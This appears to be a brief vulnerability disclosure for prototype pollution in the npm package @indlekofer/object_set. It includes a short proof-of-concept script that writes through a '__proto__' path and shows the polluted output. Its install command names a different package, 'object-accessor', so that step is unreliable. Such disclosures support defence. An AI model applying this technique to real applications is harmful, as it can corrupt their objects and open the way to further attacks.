Prototype Pollution in indlekofer/object_set
Valid
Reported on
Jan 10th 2021
Description
Prototype Pollution in @indlekofer/object_set
Proof of Concept
- Create the following PoC file:
// poc.js
var objectSet = require("@indlekofer/object_set")
var obj = {}
console.log("Before : " + {}.polluted);
objectSet.default(obj,["__proto__","polluted"],"Yes! Its Polluted");
console.log("After : " + {}.polluted);
- Execute the following commands in terminal:
npm i object-accessor # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
Occurrences
to join this conversation